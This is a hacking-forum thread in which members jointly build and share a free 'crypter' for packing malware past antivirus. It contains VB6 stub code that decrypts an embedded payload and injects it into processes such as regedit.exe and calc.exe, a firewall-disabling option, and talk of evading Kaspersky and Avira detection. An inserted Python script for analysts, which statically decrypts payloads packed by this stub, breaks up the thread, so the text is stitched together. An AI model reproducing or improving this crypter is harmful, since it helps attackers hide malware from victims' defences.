XR3X

The Matrix Project

Source

  • This topic is locked
43 replies to this topic

#1 Neelix

Neelix

    Expert

  • Moderator
  • Reputation: 582
    Excellent
  • 686 posts
  • Locationmsfconsole
Contributor

Posted 25 December 2012 - 02:22 AM

Seeking some ppl that may wanna help me to build a crypter.

The special thing is builder will be written in vb6 (by me), and stubs should be written in c, or c++, delphi, asm.

 

The idea is to build an open source crypter for everyone, 100 % free of charge. A piece of quality cause it uses high level language for stub.

 

Something like Broad Crypter just 4 free.

 

So if u think "i have to be part of this", write in this topic what u could do / code.

 

Will be a lot of fun i guess ;D


  • mirza.sahaib, akitta, PId and 1 other like this

#2 cob_258

cob_258

    Member

  • Associate
  • Reputation: 91
    Good
  • 59 posts
  • Location@DZ

Posted 25 December 2012 - 09:49 AM

I can help with asm stub


  • Neelix likes this

#3 Simon-Benyo

Simon-Benyo

    Intermediate Member

  • Associate
  • Reputation: 136
    Very Good
  • 145 posts
  • LocationSyria - Aleppo
Contributor

Posted 25 December 2012 - 01:07 PM

i can provide some c++ - asm support :)



#4 Neelix


Posted 25 December 2012 - 02:54 PM


 

Infos : Builder / Stub Source written in Vb6

 

- Iconchanger

- Cloner

- Eof

- Firewall

 

4 custom injections

 

Crypter uses RES in Builder and LoadResData in stub

 

Encryption is a modded rc4

 

 

main module stub

 

 

Option Explicit

Sub Main()
 
Dim RootByte() As Byte, RootOptions As String
 
RootByte = LoadResData(45, 15) ' File
RootOptions = StrConv(LoadResData(80, 60), vbUnicode) ' Options
 
Call RootDecrypt(RootByte, "KörperVolumen") ' Cryptkey
 
If Mid$(RootOptions, 1, 1) = 1 Then Call sDisableWall
If Mid$(RootOptions, 2, 1) = 1 Then Call RootPE(GetFilePath, RootByte)                              ' thixexe
If Mid$(RootOptions, 3, 1) = 1 Then Call RootPE(Environ("windir") & "\regedit.exe", RootByte)       ' regedit
If Mid$(RootOptions, 4, 1) = 1 Then Call RootPE(Environ("windir") & "\Updreg.exe", RootByte)        ' updreg
If Mid$(RootOptions, 5, 1) = 1 Then Call RootPE(Environ("windir") & "\system32" & "\calc.exe", RootByte) ' calc
 
End Sub
 
Function GetFilePath() As String
Dim Platz(512) As Byte
Call RootInvoke("kernel32", "GetModuleFileNameW", 0, VarPtr(Platz(0)), 512)
GetFilePath = Platz
End Function

 

 
Encryption

Public Sub RootDecrypt(ByRef ByteArray() As Byte, ByVal sKey As String)
  Const MagicByte As Byte = &HEE
  Dim PwdLen As Long
  Dim PwdAsc As Byte
  Dim i As Long
  Dim j As Long
  Dim LB As Long
  Dim UB As Long
  
    PwdLen = Len(sKey)
    LB = LBound(ByteArray)
    UB = UBound(ByteArray)
    
    For j = 1 To PwdLen
    
      PwdAsc = Asc(Mid$(sKey, j, 1)) Xor MagicByte
      For i = LB To UB Step PwdLen
        ByteArray(i) = ByteArray(i) Xor PwdAsc Xor (i And &HEE)
      Next i
      LB = LB + 1
    
    Next j
 
End Sub
 
Full Source attached, well documented. If there are any questions open pls ask.
 


  • x58, delphifocus and Rottweiler like this

#5 cob_258


Posted 25 December 2012 - 04:56 PM

Call RootDecrypt(RootByte, "KörperVolumen") ' Cryptkey

A unique key for each crypt would be better, don't you think?



#6 Neelix


Posted 25 December 2012 - 05:34 PM

I could implement that easily, will upload new one.



#7 Neelix


Posted 25 December 2012 - 06:04 PM

Option Explicit
Sub Main()
 
Dim RootByte() As Byte, RootOptions As String, RootKey As String
 
RootByte = LoadResData(45, 15)
RootOptions = StrConv(LoadResData(80, 60), vbUnicode)
RootKey = StrConv(LoadResData(120, 100), vbUnicode)
 
Call RootDecrypt(RootByte, RootKey) ' Cryptkey
 
If Mid$(RootOptions, 1, 1) = 1 Then Call sDisableWall
If Mid$(RootOptions, 2, 1) = 1 Then Call RootPE(GetFilePath, RootByte)                              ' thixexe
If Mid$(RootOptions, 3, 1) = 1 Then Call RootPE(Environ("windir") & "\regedit.exe", RootByte)       ' regedit
If Mid$(RootOptions, 4, 1) = 1 Then Call RootPE(Environ("windir") & "\Updreg.exe", RootByte)        ' updreg
If Mid$(RootOptions, 5, 1) = 1 Then Call RootPE(Environ("windir") & "\system32" & "\calc.exe", RootByte) ' calc
 
End Sub
 
Function GetFilePath() As String
Dim Platz(512) As Byte
Call RootInvoke("kernel32", "GetModuleFileNameW", 0, VarPtr(Platz(0)), 512)
GetFilePath = Platz
End Function

 

Now it's done, new builder and stub source attached.

 



  • delphifocus likes this
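
For analysts triaging samples built with this stub (an added example, not code from the thread or the project): for a 0-based array the posted RootDecrypt works out to a repeating-key XOR combined with a key-independent position mask, so the payload resource can be decrypted statically and the key recovered from known PE-header plaintext. The function names, the constructed sample buffer, the cp1252 encoding of the key string and the 0x4E offset of the DOS stub text (typical of MSVC-style stubs) are assumptions.

```python
MAGIC = 0xEE  # MagicByte from the posted RootDecrypt
# Fixed text in the DOS stub of many PE files; offset 0x4E is an assumption.
DOS_MSG = b"This program cannot be run in DOS mode."


def strip_mask(blob: bytes) -> bytes:
    """Remove the key-independent keystream part, 0xEE ^ (i & 0xEE)."""
    return bytes(b ^ MAGIC ^ (i & MAGIC) for i, b in enumerate(blob))


def root_xor(blob: bytes, key: bytes) -> bytes:
    """Port of RootDecrypt for a 0-based array; XOR makes it its own inverse."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(strip_mask(blob)))


def recover_key(blob: bytes, known: bytes = DOS_MSG, offset: int = 0x4E):
    """Recover the repeating key from known plaintext at a known offset.

    Returns None when the guess does not produce a periodic keystream
    (wrong scheme, wrong offset, or key longer than half the known text).
    """
    unmasked = strip_mask(blob)[offset:offset + len(known)]
    if len(unmasked) < len(known):
        return None
    ks = bytes(c ^ p for c, p in zip(unmasked, known))
    # Accept the smallest period that explains the whole fragment and is
    # confirmed by at least one full repeat.
    for n in range(1, len(ks) // 2 + 1):
        if all(ks[t] == ks[t + n] for t in range(len(ks) - n)):
            key = bytearray(n)
            for t in range(n):
                key[(offset + t) % n] = ks[t]  # undo the phase shift
            return bytes(key)
    return None


def make_sample() -> bytes:
    """Constructed stand-in for a PE payload: MZ magic, padding, DOS text."""
    return b"MZ" + bytes(0x4C) + DOS_MSG + b"\r\r\n$" + bytes(range(64))


if __name__ == "__main__":
    key = "KörperVolumen".encode("cp1252")  # key string from post #4
    crypted = root_xor(make_sample(), key)
    found = recover_key(crypted)
    print(found, root_xor(crypted, found)[:2])
```

Because the mask does not depend on the key, moving the key into its own resource (as in post #7) changes nothing for static unpacking: the key is either read from that resource or recovered as above.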

#8 cob_258


Posted 26 December 2012 - 01:35 PM

This is my asm stub, regedit injection is detected by kaspersky heur (can be bypassed with anti emulator)

 

 

TODO :
- fix DisableWall (problem with RegOpenKeyW)
- Update to unique password

 

 



  • Neelix and Simon-Benyo like this

#9 cob_258


Posted 28 December 2012 - 01:28 PM

update

27.12.2012
+ updated to unique password (line commented to be compatible with the old builder)
+ added debug blocker, bypassed heur detection of KAV when injected in regedit

TODO :
- fix DisableWall

 

scans

Please Login or Register to see this Hidden Content


Please Login or Register to see this Hidden Content

 

 

 

avira detects crypted file because of resource section size, any idea of how to avoid that?


* bugs in builder :

- crash if failed to overwrite the crypted file
- when you press crypt then you cancel it writes the crypted file

 

Download




#10 Neelix


Posted 29 December 2012 - 02:17 PM

Just figured it out, other res method won't help you too, but i can make an EOF Builder if you want. Currently working on Matrix, may pm me ur msn?



#11 cob_258


Posted 05 January 2013 - 10:48 AM

Asm stub updated (04.02.2013)

! DisableFireWall fixed by using 'netsh' (code from '

Please Login or Register to see this Hidden Content

')

 

Please Login or Register to see this Hidden Content

(10 / 34 )


ps: I will be absent for one or two weeks (because of my exams), feel free to modify the stub



#12 Neelix


Posted 05 January 2013 - 12:41 PM

u forgot to upload ur fixed asm stub source m8, but I am on ur previous one, reading some tuts about manual packing now, and installed masm. hope there are some ppl that code a c++ and delphi stub too.



#13 DualCoder

DualCoder

    Member

  • Associate
  • Reputation: 39
    Fair
  • 34 posts
  • LocationSweden

Posted 07 January 2013 - 03:18 PM

Here is a C++ stub I wrote for this crypter.

 

It uses T4 Code Generation to encrypt some strings, so you will need to point the Pre-Build Event to "TextTransform.exe" or remove it completely.

I think the stub is quite stable but I haven't tested it very well.

And there is no Firewall bypass in it yet.

 

Please Login or Register to see this Hidden Content

 

Source code is attached.



  • Neelix, ricota, x58 and 2 others like this

#14 Neelix


Posted 07 January 2013 - 08:22 PM

Please Login or Register to see this Hidden Content

 Dualcoder great we have a c++ coder + rep


#15 roller

roller

    Newbie

  • Members
  • Reputation: 0
    Neutral
  • 3 posts

Posted 08 January 2013 - 06:17 AM

I need the compiled this files crypt.

Please man ;p



#16 Neelix


Posted 08 January 2013 - 09:02 AM

learn how to compile them, if you can't solve it by ur own (google) may go back to hf.

also this topic is for members that working on the project, not a topic that explains how to compile a crypter.

 

so if you want use it find out how.



#17 kevox2

kevox2

    Newbie

  • Members
  • Reputation: 1
    Neutral
  • 6 posts

Posted 10 January 2013 - 12:42 AM

good luck for u project! ;)



#18 0xM3N

0xM3N

    Newbie

  • Members
  • Reputation: 0
    Neutral
  • 2 posts

Posted 12 January 2013 - 01:43 PM

good work bro , thanks d: 



#19 cob_258


Posted 14 January 2013 - 01:57 PM

I forgot to upload the stub :P



  • Ravage, x58, Cobra and 2 others like this

#20 true22

true22

    Newbie

  • Members
  • Reputation: 0
    Neutral
  • 1 posts

Posted 28 February 2013 - 01:42 PM

This is super awesome! gud job guys keep up this great job






